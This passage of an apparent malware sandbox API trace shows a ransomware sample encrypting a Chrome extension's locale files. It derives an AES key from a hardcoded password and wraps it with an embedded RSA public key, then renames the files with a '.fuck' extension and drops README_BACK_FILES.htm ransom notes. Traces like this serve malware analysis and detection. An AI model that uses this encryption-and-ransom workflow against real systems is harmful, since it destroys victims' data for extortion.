KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.196] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.196] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6eca8) returned 1 [0260.197] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6eca8, dwCertEncodingType=0x1, pInfo=0x2eb1c70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1ca0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1ca8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d0c0) returned 1 [0260.197] CryptEncrypt (in: hKey=0x2e7d0c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.197] CryptEncrypt (in: hKey=0x2e7d0c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6eec8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6eec8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.197] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6eec8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6eec8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.198] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x14c, lpOverlapped=0x0) returned 1 [0260.199] CryptEncrypt (in: hKey=0x2e7cf00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x14c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0260.199] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0260.199] CloseHandle (hObject=0x5d64) returned 1 [0260.199] CloseHandle (hObject=0x5d5c) returned 1 [0260.199] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), bFailIfExists=0) returned 1 [0260.202] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json", dwFileAttributes=0x0) returned 1 [0260.203] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.gsg")) returned 1 [0260.204] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.fuck")) returned 1 [0260.205] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.205] CryptDestroyKey (hKey=0x2e7cf00) returned 1 [0260.205] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.205] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.205] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.205] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\readme_back_files.htm")) returned 0xffffffff [0260.205] AreFileApisANSI () returned 1 [0260.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.206] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.206] GetFileType (hFile=0x5d60) returned 0x1 [0260.206] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.207] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.207] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.207] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.207] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.208] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.208] GetLastError () returned 0x0 [0260.208] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json")) returned 0x20 [0260.208] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json", dwFileAttributes=0x80) returned 1 [0260.208] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.209] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.209] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.210] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.212] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.212] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.212] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.212] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.212] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.212] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.212] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6ef50) returned 1 [0260.212] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6ef50, dwCertEncodingType=0x1, pInfo=0x2eb1930*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1960*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1968*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cf00) returned 1 [0260.212] CryptEncrypt (in: hKey=0x2e7cf00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.212] CryptEncrypt (in: hKey=0x2e7cf00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6fc98*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6fc98*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.213] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6fc98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6fc98*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.213] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xd7, lpOverlapped=0x0) returned 1 [0260.214] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd7, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0260.214] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0260.214] CloseHandle (hObject=0x5d5c) returned 1 [0260.214] CloseHandle (hObject=0x5d64) returned 1 [0260.215] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), bFailIfExists=0) returned 1 [0260.217] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json", dwFileAttributes=0x0) returned 1 [0260.218] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.gsg")) returned 1 [0260.219] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.fuck")) returned 1 [0260.220] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.220] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.220] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.220] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.220] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.220] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\readme_back_files.htm")) returned 0xffffffff [0260.220] AreFileApisANSI () returned 1 [0260.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.220] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.221] GetFileType (hFile=0x5d60) returned 0x1 [0260.221] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.222] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.222] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.222] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.222] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.222] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.222] GetLastError () returned 0x0 [0260.222] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json")) returned 0x20 [0260.222] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json", dwFileAttributes=0x80) returned 1 [0260.223] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.223] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.225] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.226] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.228] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.228] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.228] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.228] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.228] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.228] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.228] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f7d0) returned 1 [0260.228] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f7d0, dwCertEncodingType=0x1, pInfo=0x2eb2220*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2250*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2258*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d200) returned 1 [0260.228] CryptEncrypt (in: hKey=0x2e7d200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.229] CryptEncrypt (in: hKey=0x2e7d200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70160*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70160*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.229] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e70160*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70160*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.229] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x10d, lpOverlapped=0x0) returned 1 [0260.230] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x10d, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0260.230] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0260.230] CloseHandle (hObject=0x5d64) returned 1 [0260.231] CloseHandle (hObject=0x5d5c) returned 1 [0260.231] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), 